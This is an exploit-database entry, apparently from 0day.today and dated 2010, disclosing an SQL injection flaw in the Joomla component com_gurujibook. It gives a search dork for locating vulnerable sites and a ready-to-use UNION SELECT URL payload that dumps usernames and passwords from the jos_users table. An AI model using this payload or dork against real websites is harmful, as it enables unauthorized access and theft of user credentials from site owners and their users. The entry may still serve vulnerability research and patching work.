id: 10708
date: 01/22/2010
title: Joomla Component com_gurujibook SQL injection Vulnerability
author: Snakespc
cves: 

===========================================================
Joomla Component com_gurujibook SQL injection Vulnerability
===========================================================

#--------------------------------------------------------
#Joomla (com_gurujibook) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc
#site:anti-sec.info/vb/index.php     
#-------------------------------------------------------
#Dork:inurl"com_gurujibook"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users--



#  0day.today [2023-03-22]  #